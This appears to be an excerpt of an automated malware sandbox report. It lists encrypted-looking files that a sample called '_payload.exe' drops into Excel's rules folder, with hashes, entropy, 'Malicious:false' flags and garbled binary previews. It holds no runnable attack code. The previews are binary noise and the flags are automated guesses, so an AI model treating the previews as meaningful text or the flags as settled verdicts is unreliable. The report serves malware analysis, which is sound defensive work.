                                                                                                                          SHA-256:815D4938708EB871E5BD65A42B0FCA91AE7FB57227AE506F08D2C07841E02C65
                                                                                                                          SHA-512:4C796EB2E31E9C291A92A913BD99FEB1CC76C53F2383958FB39BF3B02BF61FA19C69D1302EEFAD827A232EBF6284343DADD55FB96FA9139528F0DF10275A8A85
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml#.@o..6.yx.s...8r.cC...d.c....;5z1.\...B..K.5..T.....*.>..wEz......X.y...I...U5.Z.0....Y.p.6.C`H.b;...*.Jkk.C..:...9.,w.@.v./>.#.]....n.7...2..t..M..7..!.; ..N7.%SP..J....m2.Tn.|U.]S..2.Z.R9T.......-..]L...$=5".1:Dn.mT...&.=..p.d...Ef.V..\...%`...........a0.&..!w~.}:'...L.>.f....K..,WHQ..%...E.."...%.80l+0.(.7C`..G.x.|...UF.....D;..Z\..n`%..#..g.[E...1..0..?......&.5..+!..<.@aqnB;{...z.o_$......l.L.....{_A...2.`ms..&...).........s......l..j.F.f.g..I'@\.Q...4....................X..A.$./S.a=S .o...b Td.\.|............T......G...k.....6.>..#w..6$V...G:.kk..f....8_J.h6&v...9..(8..gj.3.{.b......w..q....M.9........W=...@i..&?.I./..n..w.u...}..L*..s..K.wM.g.....'X%.2...o~.Q....Z..w.!..7IY...M.KO.6.{.x?..T....l..I..b...$.o#[.iFQ.2iM$.L.g.0pE.".........;..".2..=.. ..`.a..w...u.B..2..5.7c....F.@.G.....Q3,..OT-.....]0........V.m.........3C!..#@..).ivB,.B'..Qt.dP>F.aS.#..kD..k....:v~..B..FD....e.}.M...b...<7.......D...D..W.XR.Z0..g..f.i[...r'.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11289v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4197
                                                                                                                          Entropy (8bit):7.954475635292709
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:iWA8DnnocnTH5suk3+hODnJxemVN46wvxzpcQY3Jr:bpnvtXPwb6um6BQcr
                                                                                                                          MD5:A6E217FB5AE6628DB2D8159526DCB183
                                                                                                                          SHA1:E848AB550A980C3E3B1B1377EE51859B025CB9E8
                                                                                                                          SHA-256:0500652699054ABD4106370788D23DAE63AB90B12B34F7BA291F190CB22916DA
                                                                                                                          SHA-512:7963AD824D78D9226F29A5787569BAA786E20255E351E43C48C2427C241FA07AB7505F219DE6A15182745234C4A1384825D8BBC9994BDFC8C6E07BEC4D8FFC7C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....t.......b..r....4v./..M...E@...K%#.H.Cy<a.....Rr.[...../I..Of."wR..]....:'-.x.G....7...o.,-.j.....OA>~.7..I..%ZU.L.by...s.MX;...._GKm.5...3.v.>.s...(...{....Z)..b.HB.6G.5.S;.'.......0.zvTP..%.nj....,..F...dM:3Coq"..\....^......#.4T6....e..&.<p6..^.f...b.. .......{...8...J..{Pn..R^4(....ix..f./;JT]=.M....#.#!T..........<.=.rs....ry..:.FP..px.k:..]l...fr....i...........N..fS...d..L...........v(}.g.Wi.P.~x...LU..6...u........=4..*...."...,.J..K>`p...];7.T.k....].......584B...6....u......C...+...9..2..O&..E9.0l*.%.`.F.....o..v.-.d.{..,......,.Am)....[t..hA.V...`.q.#..2[......x....F.<.IK.U..w.....KM....<..Y......sMMU9..4@W.N@.6f.@N.UG.:..|.a!..~o.....M.jS.`...=..I.}..[.......hH:.VM...-@.c......7..V.v.^.-.cx..2.....os.....1.....o.<.s..e.g.J....\..K.a._.li..s.".r2...........~C]f.....%.M..Z.....S.5v.MS..\S....:...L<H...F..Z{j,<...,m.5.I.L|p.+p.{.~..N..!..u...V..u...d...t.|.<.r.......D<..xu....N........YZ.)*.8..X.Px..R>.....u<.*....J.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11300v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4608
                                                                                                                          Entropy (8bit):7.957844688983349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:LE8aWbsBoYFJtjcb+/RY7vtPM5ufISzP9OJZVV:yBFFJtE+ZYJPMkfDPmVV
                                                                                                                          MD5:1C83B52043F63C5980988C4F1529A9CA
                                                                                                                          SHA1:418977DDECA5522C2DF484ABA0ABB6BC0655BC30
                                                                                                                          SHA-256:354874F78A08A31502E9C6D5201C0DE92F0728464377D2FFF00EF45C1A08772B
                                                                                                                          SHA-512:5E3B8CBCB7681301095A75D190B8D062176308B1DFDA653CF37B260DC6631CEFF83AFC0A749002F79D6AECF3AA2CBA6AA5D4401D2AA197356E12E26E3A7F06AA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....q........K......u.GM..|\r......9..}Y{v.+-$../..!U..v.......<:......C.y/}...,a..n.oj0_..S.^.n..v....Z.7....\B.......Wee..Quj.Vy.V.r.@..&4.y..${.).......u'..-.~X.{...;...N.qr..d@.."..+....x....6:._.F....B..G../tT...........zb}L..1...O...M4]en....\o. m.$..5....f.l:u.Ze.(t.....:a..|.`@.o.#m.s........o..).4.q.{S...2.%.E...Y.....M...m.V...Y.....y...h.`^..I$My.....R.V...]p. .z...p......:.l..|...;...+V.......&.-1Oz&....U.k..jKbcL....^..6.&d.......D.Q7<..2=.....@..6".......2)......+...,...p.Z.t..N.#..~O.j..z...gbIT..`..._...:......."nF.....gN).,...p.9+..C..IK.kf:R^.F.n .Z..D....yw......x.h.....a..3....l.........WJ..X...(4V.&n%r.. ' <...l..$D.$....A.T(....-..........L....X...q...........Q{.x..-+..!.]...Ki..ji.=_)....z(EV.^`.....\.....V.?q>.....M..Ta..GH....=2.3`F...}..a...i.7#......X`.4....g;..J......G..f`|h..p"...L.7d&.J.7u3Nx?......Xu.x]d3. 0./...C....~...2....s\.|f..GDtz......l...y..q._....B..&<..g....e.......q..N...I.~5=..H..0%4'q.H.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11302v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2884
                                                                                                                          Entropy (8bit):7.942540782241007
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+U5XErYW1H4Jb5+FE+zA/4vvwDY/mnyBULLv2pRFmyO9A7WeX5fsQKUFD:DXEsWl4RYS/4vYHncUoRg/9E5kQKQ
                                                                                                                          MD5:8D81D01DFF4A6A0C3DB34E78770FAA04
                                                                                                                          SHA1:7D5C8029C77E3A98E8F18A4AFF44ECB1FBE98F1E
                                                                                                                          SHA-256:F685BFA77A47855C11C1213EE86F7D3AEF4D2BE9D728EC4929E774380C7BF072
                                                                                                                          SHA-512:E1ACCAC39A2A52396CBC41E89DE93D3173E8F5975D10DAB519EB4C6ADD795A57E44A2CDE09550E615DE9FF664511D8064F3CB78C7E5C9EA726005BFDC68407E6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......>k....e.P(....t..a....[.K.{.y)......O..a.,.e3.Z.E.n.k ..!...x.....t.. ..O.jz....h..'....&...cH[......@9.G/y.>.!..|...~......An.Yql......39.^..R..^DQ....V.....R1......?G7.<u.td..&..XH...X.......Z.......o.....P(..hS*O....k?..o..b.......@9.......O1.i.I4N...^......h..l._<B}$\.#?..Q....).H.....N.|....?M...L.....2.t..p.......(B8....z.QOR%.PV....B5.....7.o:8../.T_E-i...;.X......U.z..*../....-c..V.c/#$?).F....lL5z'E.......3;H..........vU.Ts.Y.CQ1N=..5.>.f....,..._..$.~.]i...<Oj-...w.1.....8...d.<...5rF...4@.Y.....m&H..c.._v..J......l.b.q..L...O..K..1.{...Z*.&.nP............x.@z2...,Cw..*.n.....l...R7#]..#W....!.^./D..cD.R:.C%...,....g..W........%.<`.......HL6q*._...f_..?....S..'..7....Uf..2..W}W.Z.@........P.Sv9...V0-.v.......?...../Z..[Z"C.S...&..a.X...C..."..r..J...8.bd...x...A.vI..8W~...(....D....K?.be...5~...V...(Z.-)i...dQ.8<....L.......'.v.02._.)......].x....ZF........r...9....7....Z...EW.O.n...k....R.|.'dP..Y9..g...-.X....DZ

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11362v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5842
                                                                                                                          Entropy (8bit):7.966979826421715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Ml+BucBzU0Z6SGXf+f7QKzvv6w0EsMc7xc/CumGVm/ExVrkQjhZh3vSLgoltRNSZ:Ml+Bu4vduLKz6nErKcbmGVm/ExVr9ZJN
                                                                                                                          MD5:C8260E74CFE4309C454E3CFA4FAC4BF7
                                                                                                                          SHA1:3B8F29A55C233DAE74FDA1BEBBFD24F1E06F147D
                                                                                                                          SHA-256:64E63ADCCDCB0FCF358612A13D578D8B311DC1A8F350E2A0EED6068C6ED62513
                                                                                                                          SHA-512:6AD51392175318E28E939AADCF6CAD0FFBD2B6A2B35BDF8FFA5FC3E2169C1DEB948BF674537C2FE51F071D5AF9C3B142DC140996032CF39D3F85F4E0111A1EF9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlr........>..r.V.K.k-.j...X.Z ..;.#....`..S.z..G.....p..<.Z..94..5y...pp..)a..-7.W...=..8L.b.M..0......kBL$.'..$ .. s.L.Ge.>[Bf;X.p.....-.Z..f...8.P..e.z.AF...V.j.*..v....C=..N..]G`...>.n._.^.x.lD..f9G.'rd....q..S.'+ ..$(.%.o..c\.~.E.G).._.j+..zE.a9.sg.v....?.CT~...`.~.A...~U.....4,....P'Br.H.B.G..cs..i.....N~.)h..:.r.@<U.....D.}..'.h.....d/2....P.'.t..k.9....R.R.aMX.8FF....d."2.....q...GR`...O...h.*.!3b.....J....@.J/_...m...P.........6..rn,.".pc....4h..)..F8]Z...q.....?..(O..'......./.._...!3B[..7r...p...*...9+.J.".....(C.h..VBW..{..!..$....N.X.......g..a.N..8.Sk.qw.p.e..Ar......,..@e.}.....y.P&.....Z|.L.* zi7......?...W5.&".s....p.).....Q...f.Up...`o....\....O.(.....ic..{.....#_...P..lt. .83..8w..K..%M.U......*8.3.^.............9...m..O....!....B}d s.&.j...[...-6FC.....S.....L:...2.'......~J.".....".}n....`..YG.8.7;..@..8@..5e2.Y...b.ib...'~..h.~.,1(.....%$k...[..&.H.)..s.bmp.Mu......>YC...|n.. .qe......k.....R..."...%G...O'.d

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11369v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2023
                                                                                                                          Entropy (8bit):7.903293406562662
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:o4MRW6kY3f/MztYll2Dej+JNCfYYlzEy8zpk2D:o4MROYP/MIYq+TY6zpX
                                                                                                                          MD5:F50962C988B0F813696123BFEEBA18C0
                                                                                                                          SHA1:2B001C48EA93D6103ED09A4F3A558ED63D0999C2
                                                                                                                          SHA-256:568548D0FEFBF17FF553EB9AADBC58760BA45C1FBD0AB3E05CC76912AD6C7679
                                                                                                                          SHA-512:6AED777562F5F3F6F7CBAE573EFF2E73FE6FB40822A1BD5524229126280309CE7C7DDA24D36533BD24887192A0F5BDEA120014EAAF2A1D8E36020CDE413A52EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...>.H...-...../.... ;b.'.k<*m.....e\W..1..:.\........f_2}.....x..;%.".0<m.[a9.&.~J....A..m$!1q.S....lC.. ...y.e!x=2..^..Za.9.h...mW..|.....Gt..Ms....G....&......;..U....=O.d.......m..Y.;..V.%ft*...{..c......$hW..NV.S.....46..3..D/Fr|.7...^....cLm..1.Q.....6...M.?Y..Q...N..w...]....<.j.v....f.zJ.Ka6...s...G,.U...H.<...AM.l..E1.......^...........F....=.G?(..e;.g..:Z;Kw.6....@.`.LX4_...&.|.r?..J/D]...l-.,.6...]V.c(.....G..B..,...o..m.)n..]>!..(r.%_.!![..u2...;#.<..B)....f./..k+K...v5..ke5|c.!.>..D..S...`-..c..U.....<Q.&.J#iI..!/.z..XH..;.Kc.........E..J.8lm;....-N/!LY.(.r.....1.KT..E.../P.f.....|.E|%...6 ....G].....Ce.g^M..(..},...$..!.6..(.....IL.X`...B.v...!>.W...Z.M;.T...o\......m.=j.w...nM-....E...E.=...^2.:'}%.2fH..h..<"....4.9.:C...Zw.4.z.....x*i6.........h...k8............8.")g. .9.DPP.u.yaXOX...d..@(....f.Hj.~$.......R.svH....W...7.^.....P.LN.v}.G......1..O.v..Z...I.....=......!Q#kxz.mLzav...<..Q.Li|n3....8..\..n..}TW..Q.e..N<6-.|...9

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11370v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1001
                                                                                                                          Entropy (8bit):7.7492063259413895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OEBzDAewhWE+OMEfZD2Ja4PQXdd13yGbD:OEBIewNnfZqJvQtRD
                                                                                                                          MD5:6BE29E9B6262784E96B59DFD93E3152F
                                                                                                                          SHA1:B3524813E0668BD7C08202EDE38806BF1A379079
                                                                                                                          SHA-256:C0FDDCDF67B1774FCED59373A77FE57BEEA7A68FA73FD0B51EF1BB9C766143F2
                                                                                                                          SHA-512:00F2C850A21FB9CE883B82BFE501C77774BCB12580269EF814A508BDCDEA27C092D0445D2E609A9603E7BC430E9A97217068FB6D9312821E10F4C3BB115FB624
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.|..K.~[?.6...'so.O.C.MM..Ii5...I.b...v....H"..(V...'....A..y.........m..vZ.LF3....E........}.#......d-.|.......#I...r....[..._...Eo&..M.Z. DS.K@.ux.Jv.....7*...I..Fk%`r.J...@........m.3...T..g.b.....X.`..."...(.?.. kdH..j..Y..fy.Q2.'.v...s.].....7ni!.....c..m..cb........t^...l.....]..%.'f.c(r.[...N... .n..d u.....g..Y.n...6I.`.s.8...+I#..!...u3f..P..AJ..s..0J...p.S..>..x.U,..+N".....9.n.<.i.V.......r."..K..*..\..*o2I*...t!.X..o<+D.e..d...<......e .~...?{.-..bC3h..d>..W.P............e.....2.B2.....Pl.A+...c.@..9..)..].....b....G.B...w.T..:.k..Ip.vI...v=.+..../.q...V+..QPi......q_p.x...+.!}M.....YP*.....o......-R..".xp9O...].........r.l..Z1..X....$G.......(........Qi..-.{..F....Oi.6...x`..;W5.h..=..'..@.`..-pk...]6.fs......?..*.t.....'..p.F8...d..Vsu].b.Gv.W_..?.Y5....`...q...e....C..c..B...dDG@f..@;.0.I...Ue..3.A.du"..;E........ ..{...<..!?.%...x.b..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11381v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2743
                                                                                                                          Entropy (8bit):7.92538444113325
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Zmy1DRsPZptoDNNy7oMefStNsWx7aTVOlE+s63xDwArjIAATCatz0ZJrDcRtal2D:f1tuZiyUBSNsg7aTgWW90NRz0ZRDOMg
                                                                                                                          MD5:01A406B7FD059ADE5B2247C9CF6C8F0C
                                                                                                                          SHA1:1DB682790649FADB24B300C588E8BA568D1F1264
                                                                                                                          SHA-256:B2432583DA6363708850B6FF8787BD26E7C8928CFB4F4819E25B4979716C5FA9
                                                                                                                          SHA-512:20810877EA90FCC9EF19E6DFE6D37FA39410DC35673660E28C8364E6E50A5A79D4BCE521AAFA103C5FCDD150061E33CEB21C5CC4BB4CFA1DC4034FC8996D8046
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...H..H.R.*,..o..........v-...........\.ex......Sn..q..G.......(X....b...!S.t.R.(c.x.........{M.\.=)l.AA.E...:ye......d.E<Lp.....m.<\,a......s.p..AV...H...Y<..G.rP.P..X.B_...."%.'.6...JC..\A.o?P..&....*+...%..^+............D|;..Wv...?..r.=1<.#..-q;.z..L.rS.b...#.`Mg.....Qs...R..0.b.w9.j.....#...U1g......fRyo....^....|....Z..Hq..:6..c..4|..@.-.t...%.o..w...;.....i.......".QX.h....../..$...k.6...IU.A....Up"..v|.J...n.(6..D1.;;..W....y..OjZ._C..a.UV..4e9T.!...54..9...&.U..d ....;...d.#..g..[5.....0.Q........Re*.AN...$V....n...M..x...|.wh<.G...5@\=..B?.Z4|....l.(@..P.<s..`......Z<nV.?..d.1E...|.._.5i...<.f..mP.?..!!*2o.....0-`+S6J){.,....}f_.SAx.x;Z!.1..f>^TPU+i5.a.`.q...w$7.*'.7H......... <...*......t..k..I.w|I...V...R....Z*..+@..pl.0.H.v.W....8..4H..?...d.i..N.\.CN..d..T-K.w......\.>..l5c.wS...7......C}...............j...9..'....^.k=....D..Z2L."{...1b..&....*.B.Z...k..nd......V+...........B.-...[..1|._.}.*..E&...@.XL....S..o..9(s..6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11063
                                                                                                                          Entropy (8bit):7.984563118116505
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:t0Rn4uWuaTXzFbpwP1ggkHTTjWRZ3oblrtyt/qX7UZRRbmOVTZwJ0Po+bh:t+4uWFXzFdhrW3ItCtZ/BFwJ0Pos
                                                                                                                          MD5:0A058AC4ED1A9E60D5013CC8E92380C5
                                                                                                                          SHA1:D98163FFCACBD3369B3CE657F66CB60A082002F0
                                                                                                                          SHA-256:A979BDF78DE4B844B34084BF7B4949C3260E317D1435F59D6FE134D95E19F7BC
                                                                                                                          SHA-512:67756B326190D591DB7D0FF677FBF474704E613304C323647858F04C0BF0B9B7552AEBF4084FE512877637E29105C739B9DBA2CB0AD62765E92C08E4BA0E76A4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.K..HU.R.!#.>....D..Lm..},....#w....)L..Lj..R..>.c.O..c...`'v=.PS.*b..O..4KQ.8.&".Xi.bX?{.B.....T.RF..........r.......HJ....QQW..}..G...t..K...tM.......y.?...8..6....7c..$...^{\..[G".`..9...8;...W......-......G..*.x..&............i..\.....T..j5E!...Ta......3u.3....&....s>..p......../.b.""~.o.2$...~.W.$.....k...#.\.3N.,l.ky-+zq.^t.k:f..c..H.l.#..k..`S>...\p.:X.h..............ZB..;Sm...O-..._.......;...j..... |:b0f..8.W|...=...Oz..J....0f.L...?....K.@.uz.?.4.]....30.vN.+(:".'s@.z.(..B=@*.@......#."....B.(.G.?.b33.=W....o..4}...~....>.$....q.&.=dOru`... ..P.TZ_.>l.=q...E..G....(...v..C.}...........2...".A...3j^!.F.._.gS...P../...|...`.@.N}.r....b....m0..]. K.3..@.W.K_./{.@*.....$......L&h!...0..m.......O..8.&.1...Q|...]!......?...&...E....U...T..UJ..L.%.9D...`.9....WB@,..R.....Q..........O...R...2.._..\..9......&Pe.fdJ....d..9...+Znk..W...mh.U.;.)..+.T.Xg...B.}...n..S/....V.h.......rh..!......;v...%UDW.../tQk.jO..11..)G..~

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11464v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):807
                                                                                                                          Entropy (8bit):7.7474513513222085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:AUODD/2BY5K8ey5aa2m4RXJD/ATmDH0nVbD:AUWD/2BYU4o9+yQFD
                                                                                                                          MD5:BE1A0F5A39477A0583D47948A894B572
                                                                                                                          SHA1:C5A14EA180E348BFA9169484C55E713AE62D59D0
                                                                                                                          SHA-256:F0CF141D164F75EB4ACA84FBDC3BE6D81350D1DBCC92BA95A2A673CE34F01FEB
                                                                                                                          SHA-512:31E08E89E1AA177823FA5EC8BF04018E0D5A0E49CA6A923B104D28EC0028999ACE0139DC39C8F7151926389631757E3D70D06B396ECE603857996A1C398A2A70
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml}..../..GCI..7.@.L]...C[.w..G.x...).jQ."G.g13.'J.t..0S..z......d..F(.s......i......S.....,D..K.3.,Bx.w.sv.b.../rB.%^'..}Jk.t..3e.?...H.H..7.:..6..\....AG...R......s..U|.Ai..7".V.P...v_.....Y.w..9W.XEY...v-......}U..l...=.b.x.n.R..N...|.._O.q..+j.S...W..\^..S!.....[...d....T.......\Q(].......Q..L[.K.g.S2......P.w.U...`n...F...8..R<.0.OF....F,.+.|@..%p.u"..u...+.g..6n<...qW'..*..-..R...~..............., .~.....".8E.y.....`.6...m.X..!|......a`F.aHmc.J....L...(.M..R.|C.`.q.I$wnY...p.t.r..".h..>C.[..6.M.[a....*?rk.aY....u..=.../.bR..c[.&f..R....z..%..(.!...;.p.Y..,.}{~..:D....4..l.f.....Xc.....[.H2.yo}.l.]>......F<..@.,[....k.6)i.~.V1.Z.....:.5.2.P...t......?gW..[R../...D.m..r27.L...~.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11498v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):747
                                                                                                                          Entropy (8bit):7.686273564265831
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:R+RyF8gxVQemMG/fFyLEtsJ0ncKNjdIixYoObaDnibb/qLIKdXQ8W6P/wm2hkkqt:R+nDBlyLOZcKwDoObaD+b/qfxQQ3Ehk9
                                                                                                                          MD5:BC65528076B221A71151B16B08CBB015
                                                                                                                          SHA1:4E16CE9DE2EA5B2669FF16429E1F9FAC101A967C
                                                                                                                          SHA-256:42D4D127DD48ABB1BB0699DDE23502FFB78982BC6AE40262051DF12C5EB8E3D6
                                                                                                                          SHA-512:635C00711F56DE83ECCF3533EE6267D1EA050AF2CFE3A0EB4794C8B114D0C9E9F83CC7DB512A8D3EDC3A17F79D9D33381C2F999FE86D723DF38063B9C15A0D91
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....s.s..U..o.-.. ....7.(.TGV.S.m.k.7N.)q?.y2.,...}..(.8... Z..<.w.cc.T.P....TR. .7A.....GH.....w..=...-.p...6.v..>]u...-.i.X.......~{.}.YZ.....9...%........|.."....'.....(![.Y...I...U.[.9...../m-a...7.fB.n#..*.qS.N..1..J.h..g.:R....0....3..?P...e....K..g...h._..-.g.|xO.m.Ib'd......pU.H.a.~..&F3...i>.($.-.$.}h...>...-$}...o'c+.q.E.....B.~1+.~.e....4.!0.={R_...+C.I..l.QnP.I.z...0..H..*..so.B[[......m./.h".....F.D...A;....j..uc.v..N+.-...V.....-u.*.X6.O.......P.X.2.f\.#n......U..I...Q.q.A.........{*...._1.3..0....QI...9.Dg/....8..K5.....Y..ctQ..:7.....O.4..Mc(~%...P..O`....5..~H...^...T./......~...Y..../c...\cI....P.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11499v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1786
                                                                                                                          Entropy (8bit):7.895264165594072
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:++eyoUJcOlPAccjWVAP/U6egSF+rilsmOKXD4lD:DeyoUelcbcU3gpriD7S
                                                                                                                          MD5:D0CD14A5405F5A7FAA44E36EC376D83F
                                                                                                                          SHA1:8686E213E946A729366FADEA59304B8249067AF2
                                                                                                                          SHA-256:15BDCA28E664CCB1E938BF140992227717EE3C968154934382BD91BA57B31DF0
                                                                                                                          SHA-512:117A71C2D436453BDFF0A5E0D28905127E366B124622AD1F328F57CA96B52360A16D7A8A81CD88AB6F12B885B2B356FDDFD88FAD2876F451EDB8A067D273A632
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Y{.6J.Yc......{.v.5.....!].d.B`:.....;#.S..'.~v.S.b....g.jp.6I.3..H<%y.N.,^...0.C^...n!.}......I........:..Y.Mk.urW.n......`Q_..R-KZo......_T..J.L...~.C1".X......~;.}b..8.d..s.I....:....i.Kc.]6E.aY.,_...:fc..Y."...j...T..p..i.....jU..u.9..).~...9#.=L....x.n.....VC..T$.3.'.VWw.>..M.fo,v....K)...+..|Z...~{...I........:.@.#..P..F.-..j....,c..oty..n.N..<.j.. ...T..\..spT..kI.Xr.Rr2.;..>..}...UK".+8...GQ....><.a.7%.#..m.0.<.......(.@.d^;.|.......(..@...1.24`.4JN..~$...B.#...).._....}.0..1.<.c....i.I....d.S...S.d...0..kHf..hU(........./V?..-%.+=.;..g........9.c..I,.....5&M./..j..M........L!...F[.&..*..9E...-..q../...E.U......be.......c<...$'t&..s.}.*d.a?..!!q|.........r.....\.9....,=...v...k....2.4.R.-1`,]8..Bd/..T<..HC...\.^7.!.E...^...!C..O..pV.4.......'./....X.2\..,\...CGF.%....+.x.oZ.....x&..oni...._..J.._,F0..-.$.. (..). .&...|.M.....K*.)u`n....0....Vx........^..h..Ap.....Ci\.+B.!....N.ea...&M..K.R...{...t;.@..+.....+B.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11500v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):886
                                                                                                                          Entropy (8bit):7.763527296433059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ex56J2Bg7qBtniPNrpYi95UoP42B5y0bipb0MfdefWMxlnsE7dbvznguq5bTciik:Q68+72iP1pX5bnufwrjrgTbD
                                                                                                                          MD5:56E22A5E0125D697DB689B702789073A
                                                                                                                          SHA1:AD56317AFB515314EDB501F21D6EE95AF4C7715D
                                                                                                                          SHA-256:24E1A4D541CE19161AB55A50B1D42995E61DE365F9606C1957A66AF0273DA48B
                                                                                                                          SHA-512:2A5D33806D2B806FE5E81CF7566BDC7B811ABCCEACD5150B9C905C5B64DBC76EE056508B3012D0A532DF3F670EAD72B6AA9B47775EC0C10421C68FA0BCBF0094
                                                                                                                          Malicious:false
